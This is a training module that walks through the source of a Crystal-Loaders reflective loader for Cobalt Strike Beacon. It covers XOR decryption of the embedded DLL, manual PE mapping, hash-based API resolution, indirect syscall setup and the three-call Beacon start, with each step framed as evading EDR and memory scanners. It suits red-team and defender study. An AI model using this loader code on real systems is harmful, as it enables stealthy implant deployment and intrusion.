Module 5: The UDRL Loader Walkthrough
A line-by-line analysis of Crystal-Loaders' udrl/src/loader.c — the single C source file that decrypts, loads, and launches Beacon.
Module Objective
This is the core module of the course. We walk through every step of the actual loader.c source code: from extracting encrypted resources, through PE loading with LibTCG primitives, to the three-call Beacon initialization protocol. By the end you will understand exactly how a Crystal-Loaders UDRL turns a raw encrypted blob into a running Cobalt Strike Beacon.
1. File Overview
The loader is a single C source file compiled with MinGW into position-independent code. It has no standard C runtime — every external function is resolved at runtime through Crystal Palace's DFR (Dynamic Function Resolution) mechanism.
Include Headers
The file includes four headers, each providing a distinct capability layer:
C - loader.c includes
#include <windows.h>
#include "beacon.h" // BUD structures from Cobalt Strike
#include "gate.h" // LibGate indirect syscalls
#include "tcg.h" // LibTCG PE loading primitives
Header Responsibilities
| Header | Provides |
|---|---|
| windows.h | Standard Windows type definitions (LPVOID, DWORD, BOOL, etc.) |
| beacon.h | Cobalt Strike BUD structures: USER_DATA, SYSCALL_API, RTL_API, ALLOCATED_MEMORY |
| gate.h | LibGate indirect syscall stubs and resolution functions |
| tcg.h | LibTCG PE primitives: ParseDLL, LoadDLL, ProcessImports, EntryPoint (note: FixSectionPermissions is defined locally in loader.c, not in tcg.h) |
BOF-Style DLL Imports
Instead of normal import table entries (which would require an IAT and break position independence), the loader declares every external function using DECLSPEC_IMPORT with the LIBRARY$Function naming convention. Crystal Palace's DFR rewrites these at link time into hash-based runtime resolution calls.
C - BOF-style imports
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect(LPVOID, SIZE_T, DWORD, PDWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualFree(LPVOID, SIZE_T, DWORD);
DECLSPEC_IMPORT int MSVCRT$strncmp(const char *, const char *, size_t);
Why BOF-Style?
This naming convention originates from Cobalt Strike's Beacon Object Files (BOFs). The LIBRARY$Function pattern tells the Crystal Palace linker to replace each call site with an invocation of resolve(LIBRARY_HASH, Function_HASH). The result: the compiled PIC blob has zero IAT entries and resolves every API call at runtime through PEB walking and EAT parsing.
Key Defines
C - defines
#define NTDLL_HASH 0x3CFA685D // ROR13 hash of "ntdll.dll"
#define memset(x,y,z) __stosb((PBYTE)(x),(BYTE)(y),(SIZE_T)(z))
#define GETRESOURCE(x) (char *)&x
Define Breakdown
| Define | Purpose |
|---|---|
| NTDLL_HASH | Pre-computed ROR13 hash of the string "ntdll.dll", used by ResolveSyscalls to find ntdll without string comparison |
| memset | Macro replacing standard memset with the compiler intrinsic __stosb, which avoids linking to the C runtime |
| GETRESOURCE | Casts a zero-length array (section marker) to a char *, giving access to the length-prefixed data that Crystal Palace linked into that section |
2. Embedded Resources
Crystal Palace links the encrypted Beacon DLL and XOR key into named PE sections at build time. The loader accesses them through zero-length array markers — a technique that produces no data in the object file but provides a symbol pointing to the start of the section.
C - section markers
// Zero-length arrays in custom sections; Crystal Palace fills these at link time
char _DLL_[0] __attribute__((section("dll")));
char _KEY_[0] __attribute__((section("key")));
The RESOURCE Structure
Every embedded resource is stored as a length-prefixed byte array. The first field is an int length, followed by a char value[] flexible array member. This structure lets the loader know exactly how many bytes to process without relying on sentinel values or section headers.
C - RESOURCE typedef
typedef struct {
    int length;
    char value[];
} RESOURCE;
Crystal Palace Link Pipeline (diagram): raw bytes -> XOR with 128-bit key -> 4-byte DWORD length prefix -> "dll" section
When Crystal Palace's spec file processes push $DLL / xor $KEY / preplen / link "dll", the pipeline executes these four steps:
Spec Pipeline Steps
| Step | Spec Command | Action |
|---|---|---|
| 1 | push $DLL | Push the raw Beacon DLL bytes onto the spec stack |
| 2 | xor $KEY | XOR the top-of-stack with a generated 128-bit key |
| 3 | preplen | Prepend a 4-byte length field (creating the RESOURCE structure) |
| 4 | link "dll" | Link the result into the "dll" section of the final PIC blob |
3. The go() Entry Point — Full Walkthrough
The go() function is the loader's entry point — the first code that executes when the PIC blob runs. It orchestrates the entire loading sequence in nine discrete steps. Each step has a single responsibility and builds on the previous one.
go() Execution Pipeline (diagram): Step 1 -> Step 2 -> Step 3 -> Step 4 -> Step 5 -> Steps 6-7 -> Step 8 -> Step 9
Step 1 — Get Embedded Resources
The loader retrieves pointers to the encrypted Beacon DLL and the XOR key from their respective PE sections using the GETRESOURCE macro.
C - Step 1
RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);
What GETRESOURCE Returns
GETRESOURCE(_DLL_) expands to (char *)&_DLL_. Since _DLL_ is a zero-length array at the start of the "dll" section, its address points directly to the RESOURCE structure that Crystal Palace linked there. The caller then casts the result to RESOURCE *. The dll->length field gives the encrypted payload size, and dll->value points to the encrypted bytes.
Step 2 — Allocate + XOR Unmask
A fresh RW buffer is allocated for the decrypted Beacon DLL. Each byte of the encrypted payload is XOR'd with the corresponding byte of the rotating key.
C - Step 2
// Allocate RW buffer for the decrypted Beacon DLL
PBYTE src = KERNEL32$VirtualAlloc(NULL, dll->length,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// XOR-unmask: each byte of payload XOR'd with rotating key
for (DWORD i = 0; i < dll->length; i++)
    src[i] = dll->value[i] ^ key->value[i % key->length];
Key Rotation
The expression i % key->length implements key rotation. The 128-bit (16-byte) key repeats every 16 bytes of the payload. This is a simple XOR cipher — not cryptographically strong, but sufficient to prevent static signature detection of the Beacon DLL on disk and in the PIC blob.
Step 3 — Parse PE
LibTCG's ParseDLL reads the PE headers from the decrypted buffer and populates a DLLDATA structure with section info, import table pointers, relocation data, and entry point offset.
C - Step 3
DLLDATA data;
memset(&data, 0, sizeof(DLLDATA));
ParseDLL(src, &data);
DLLDATA Contents
After ParseDLL, the data structure contains everything needed to manually load the DLL: the IMAGE_NT_HEADERS pointer, the section table, import directory RVA, relocation directory RVA, and the AddressOfEntryPoint. The original buffer (src) is still needed as the source of section data.
Step 4 — Allocate + Load DLL
A second allocation provides the final memory region where the Beacon DLL will live. LoadDLL copies sections to their correct virtual offsets, and ProcessImports resolves the Beacon DLL's own import table.
C - Step 4
DWORD size = SizeOfDLL(&data);
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LoadDLL(&data, src, dst);
// Initialize import resolution functions
IMPORTFUNCS funcs;
funcs.loadLibraryA = KERNEL32$LoadLibraryA;
funcs.getProcAddress = KERNEL32$GetProcAddress;
ProcessImports(&funcs, &data, dst);
LibTCG Loading Primitives
| Function | Responsibility |
|---|---|
| SizeOfDLL | Returns SizeOfImage from the PE optional header, the total virtual size needed |
| LoadDLL | Takes three arguments: DLLDATA, source buffer (src), and destination (dst). Copies each PE section from src to the correct offset in dst, applies base relocations |
| ProcessImports | Takes three arguments: an IMPORTFUNCS struct (holding LoadLibraryA and GetProcAddress pointers), DLLDATA, and destination. Walks the import descriptor table, resolves each imported function, patches the IAT |
Step 5 — Initialize BUD (Beacon User Data)
The BUD (Beacon User Data) is a set of structures that the loader passes to Beacon. It provides Beacon with pre-resolved syscall stubs, RTL function pointers, and memory region metadata for sleep masking.
C - Step 5
USER_DATA bud;
memset(&bud, 0, sizeof(USER_DATA));
bud.version = COBALT_STRIKE_VERSION; // 0x041100 = CS 4.11
SYSCALL_API syscalls;
memset(&syscalls, 0, sizeof(SYSCALL_API));
bud.syscalls = &syscalls;
RTL_API rtlFunctions;
memset(&rtlFunctions, 0, sizeof(RTL_API));
bud.rtls = &rtlFunctions;
ALLOCATED_MEMORY memory;
memset(&memory, 0, sizeof(ALLOCATED_MEMORY));
bud.allocatedMemory = &memory;
BUD Sub-Structures
| Structure | Field | Purpose |
|---|---|---|
| USER_DATA | version | Cobalt Strike version identifier; Beacon uses this for compatibility checks |
| SYSCALL_API | bud.syscalls | Contains function pointers for 36 Nt* syscall stubs that Beacon calls instead of using ntdll directly |
| RTL_API | bud.rtls | Contains pointers to Rtl* utility functions (rtlDosPathNameToNtPathNameUWithStatus, rtlFreeHeap, and rtlGetProcessHeap) |
| ALLOCATED_MEMORY | bud.allocatedMemory | Tracks memory regions so Beacon's sleep mask can encrypt/decrypt them during sleep cycles |
Step 6 — Fix Section Permissions + Track Memory
After loading, all sections are RW. FixSectionPermissions iterates through each PE section and calls VirtualProtect with the correct permission flags. It also populates the ALLOCATED_MEMORY_REGION metadata so Beacon knows the layout of its own memory.
C - Step 6
FixSectionPermissions(&data, dst, &memory.AllocatedMemoryRegions[0]);
Section Permission Mapping
| Section | Permission | Windows Constant |
|---|---|---|
| .text | Execute + Read | PAGE_EXECUTE_READ |
| .rdata | Read Only | PAGE_READONLY |
| .data | Read + Write | PAGE_READWRITE |
| .pdata | Read Only | PAGE_READONLY |
| .reloc | Read Only | PAGE_READONLY |
Why Permissions Matter
Allocating the whole image as RWX would work functionally, but it is a glaring detection indicator, because EDR products flag RWX memory regions as suspicious. The loader instead allocates the image as RW and then applies the correct per-section permissions, so the loaded Beacon DLL shows a memory scanner the same per-section protections that a normally loaded DLL would.
Step 7 — Set Cleanup Info
The loader tells Beacon how the memory was allocated and whether Beacon should clean it up. This metadata is critical for Beacon's sleep masking — it needs to know the allocation method to correctly free or re-protect memory during sleep.
C - Step 7
memory.AllocatedMemoryRegions[0].CleanupInformation.AllocationMethod = METHOD_VIRTUALALLOC;
memory.AllocatedMemoryRegions[0].CleanupInformation.Cleanup = TRUE;
memory.AllocatedMemoryRegions[0].Purpose = PURPOSE_BEACON_MEMORY;
Cleanup Fields
| Field | Value | Meaning |
|---|---|---|
| AllocationMethod | METHOD_VIRTUALALLOC | Memory was allocated with VirtualAlloc (as opposed to NtMapViewOfSection or HeapAlloc) |
| Cleanup | TRUE | Beacon should free this region when shutting down |
| Purpose | PURPOSE_BEACON_MEMORY | This region contains the Beacon DLL itself (not shellcode or other data) |
Step 8 — Resolve Syscalls + RTL Functions
Two resolution functions populate the BUD sub-structures with live function pointers. These pointers allow Beacon to execute syscalls indirectly (through LibGate stubs) and call Rtl* utilities without importing them.
C - Step 8
ResolveSyscalls(&syscalls);
ResolveRtlFunctions(&rtlFunctions);
Why Resolve at Load Time?
By resolving all 36 Nt* functions and the Rtl* utilities during loading, the loader spares Beacon from resolving them itself during operation. Each Nt* or Rtl* call that Beacon routes through the BUD uses a pre-resolved function pointer. This removes a detection surface: EDR products that hook GetProcAddress or LdrGetProcedureAddress do not see Beacon resolving these functions at run time.
Step 9 — Get Entry Point, Clean Up, Call Beacon
The final step resolves the Beacon DLL's entry point, frees the decrypted buffer (no longer needed), and makes the three DllMain calls that constitute the Cobalt Strike initialization protocol.
C - Step 9
DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
// Free the decrypted buffer (no longer needed)
KERNEL32$VirtualFree(src, 0, MEM_RELEASE);
// Three DllMain calls — this is the Cobalt Strike protocol:
entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud); // Pass BUD to Beacon
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL); // Standard DLL init
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL); // Start Beacon
Buffer Cleanup Timing
The decrypted buffer (src) is freed before calling Beacon's entry point. This is intentional: the buffer contains a fully decrypted copy of the Beacon DLL, which would be trivially detectable by a memory scanner. By freeing it before Beacon starts operating, the loader minimizes the window during which a cleartext DLL exists in memory. The loaded copy at dst has proper section permissions and looks like a normally loaded module.
4. The Three DllMain Calls
Unlike a normal DLL that receives a single DLL_PROCESS_ATTACH call, Cobalt Strike Beacon requires three separate DllMain invocations. Each call uses a different fdwReason value and passes different data through the parameters.
Three-Call Initialization Protocol (diagram): DLL_BEACON_USER_DATA (reason = 0x0d) -> DLL_PROCESS_ATTACH (reason = 0x01) -> DLL_BEACON_START (reason = 0x04)
Call-by-Call Breakdown
| Call | fdwReason | hinstDLL | lpReserved | Purpose |
|---|---|---|---|---|
| 1 | DLL_BEACON_USER_DATA (0x0d) | 0 (unused) | &bud | Passes the USER_DATA pointer to Beacon. Beacon stores references to SYSCALL_API, RTL_API, and ALLOCATED_MEMORY for later use. |
| 2 | DLL_PROCESS_ATTACH (0x01) | dst (base address) | NULL | Standard DLL initialization. Beacon sets up internal state, communication channels, and thread-local storage. |
| 3 | DLL_BEACON_START (0x04) | go (loader addr) | NULL | Signals Beacon to begin execution. The go function pointer is passed so Beacon can free the loader's memory region. |
Call 1: DLL_BEACON_USER_DATA (0x0d)
This custom reason code (not a standard Windows constant) tells Beacon's DllMain that the lpReserved parameter contains a USER_DATA*. Beacon casts it and stores the three sub-structure pointers internally. These pointers are used throughout Beacon's lifetime:
- SYSCALL_API: called every time Beacon needs an Nt* function (file I/O, memory operations, thread management)
- RTL_API: called for heap management and DOS-to-NT path conversion
- ALLOCATED_MEMORY: read during every sleep cycle to encrypt/decrypt memory regions
Call 2: DLL_PROCESS_ATTACH (0x01)
This is the standard Windows DLL initialization call. Beacon uses this to perform one-time setup: initialize its configuration parser, set up named pipes or HTTP channels, configure sleep timers, and register exception handlers. The hinstDLL parameter receives the base address (dst) so Beacon knows where it is loaded in memory.
Call 3: DLL_BEACON_START (0x04)
The final call passes DLL_BEACON_START (0x04), a custom reason code that Beacon treats as a start signal. It is not a standard Windows value: the standard DllMain reasons run from 0 to 3, and DLL_THREAD_ATTACH is 0x02. The hinstDLL parameter receives the go function pointer, which is the address of the loader itself. Beacon stores this address so it can later call VirtualFree on the loader's memory region, erasing the UDRL code from memory after initialization is complete.
Order Matters
The three calls must happen in this exact order. Call 1 must precede Call 2 because Beacon's DLL_PROCESS_ATTACH handler may use the syscall stubs that were passed in Call 1. Call 3 must be last because it starts the Beacon main loop, which never returns — any code after Call 3 will not execute.
5. The resolve() Function
The resolve() function is the bridge between BOF-style import declarations and runtime API resolution. Crystal Palace's DFR mechanism rewrites every KERNEL32$VirtualAlloc call into a resolve(KERNEL32_HASH, VirtualAlloc_HASH) call at link time.
C - resolve()
char * resolve(DWORD modHash, DWORD funcHash)
{
    PVOID mod = findModuleByHash(modHash);
    return findFunctionByHash(mod, funcHash);
}
DFR Resolution Flow (diagram): KERNEL32$VirtualAlloc(...) -> resolve(K32_HASH, VA_HASH) -> findModuleByHash -> findFunctionByHash
Resolution Internals
| Function | Mechanism | Returns |
|---|---|---|
| findModuleByHash | Walks the PEB's InLoadOrderModuleList, computes ROR13 hash of each DLL name, compares against modHash | Base address of the target DLL |
| findFunctionByHash | Parses the DLL's Export Address Table (EAT), computes ROR13 hash of each export name, compares against funcHash | Address of the target function |
No Strings in the Binary
Because Crystal Palace converts every module and function name to a ROR13 hash at link time, the final PIC blob contains no API name strings whatsoever. Static analysis tools that search for strings like "VirtualAlloc" or "NtAllocateVirtualMemory" will find nothing. The only way to determine what APIs the loader calls is to reverse-engineer the hash values or analyze the code dynamically.
6. ResolveSyscalls() — All 36 Nt* Functions
ResolveSyscalls populates the SYSCALL_API structure with resolved entries for every Nt* function that Beacon supports. Each entry contains both the function address and the syscall number (SSN), enabling LibGate's indirect syscall mechanism.
C - ResolveSyscalls()
void ResolveSyscalls(SYSCALL_API * syscalls)
{
    PVOID ntdll = findModuleByHash(NTDLL_HASH);
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtAllocateVirtualMemory_HASH),
        &syscalls->ntAllocateVirtualMemory);
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtProtectVirtualMemory_HASH),
        &syscalls->ntProtectVirtualMemory);
    // ... 33 more Nt* functions elided here (36 in total)
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtWaitForMultipleObjects_HASH),
        &syscalls->ntWaitForMultipleObjects);
}
ResolveSyscallEntry Internals
Each call to ResolveSyscallEntry does three things:
- Stores the function address in the SYSCALL_API_ENTRY
- Reads the SSN (System Service Number) from the mov eax, SSN instruction at the start of the ntdll stub
- Locates the syscall instruction within the stub for indirect syscall execution
Complete SYSCALL_API — All 36 Nt* Functions
The following table lists every Nt* function in the Beacon SYSCALL_API structure (field names use lowercase nt prefix). These cover all system-level operations that Beacon performs: memory management, process/thread manipulation, file I/O, and object management.
| # | Field Name | Category |
|---|---|---|
| 1 | ntAllocateVirtualMemory | Memory |
| 2 | ntProtectVirtualMemory | Memory |
| 3 | ntFreeVirtualMemory | Memory |
| 4 | ntGetContextThread | Thread |
| 5 | ntSetContextThread | Thread |
| 6 | ntResumeThread | Thread |
| 7 | ntCreateThreadEx | Thread |
| 8 | ntOpenProcess | Process |
| 9 | ntOpenThread | Thread |
| 10 | ntClose | Object |
| 11 | ntCreateSection | Memory |
| 12 | ntMapViewOfSection | Memory |
| 13 | ntUnmapViewOfSection | Memory |
| 14 | ntQueryVirtualMemory | Memory |
| 15 | ntDuplicateObject | Object |
| 16 | ntReadVirtualMemory | Memory |
| 17 | ntWriteVirtualMemory | Memory |
| 18 | ntReadFile | File I/O |
| 19 | ntWriteFile | File I/O |
| 20 | ntCreateFile | File I/O |
| 21 | ntQueueApcThread | Thread |
| 22 | ntCreateProcess | Process |
| 23 | ntOpenProcessToken | Token |
| 24 | ntTestAlert | Thread |
| 25 | ntSuspendProcess | Process |
| 26 | ntResumeProcess | Process |
| 27 | ntQuerySystemInformation | System |
| 28 | ntQueryDirectoryFile | File I/O |
| 29 | ntSetInformationProcess | Process |
| 30 | ntSetInformationThread | Thread |
| 31 | ntQueryInformationProcess | Process |
| 32 | ntQueryInformationThread | Thread |
| 33 | ntOpenSection | Memory |
| 34 | ntAdjustPrivilegesToken | Token |
| 35 | ntDeviceIoControlFile | File I/O |
| 36 | ntWaitForMultipleObjects | Synchronization |
Category Breakdown
| Category | Count | Examples |
|---|---|---|
| Memory | 10 | ntAllocateVirtualMemory, ntProtectVirtualMemory, ntFreeVirtualMemory, ntCreateSection, ntMapViewOfSection, ntOpenSection |
| Thread | 9 | ntGetContextThread, ntSetContextThread, ntResumeThread, ntCreateThreadEx, ntQueueApcThread, ntTestAlert |
| Process | 6 | ntOpenProcess, ntCreateProcess, ntSuspendProcess, ntResumeProcess, ntSetInformationProcess, ntQueryInformationProcess |
| File I/O | 5 | ntReadFile, ntWriteFile, ntCreateFile, ntQueryDirectoryFile, ntDeviceIoControlFile |
| Token | 2 | ntOpenProcessToken, ntAdjustPrivilegesToken |
| Object | 2 | ntClose, ntDuplicateObject |
| System | 1 | ntQuerySystemInformation |
| Synchronization | 1 | ntWaitForMultipleObjects |
Module 5 Quiz: The UDRL Loader Walkthrough
Q1: What value is DLL_BEACON_USER_DATA?
Q2: Why does the loader pass go as the hinstDLL parameter in the DLL_BEACON_START call?
Q3: How many Nt* functions does the SYSCALL_API structure support?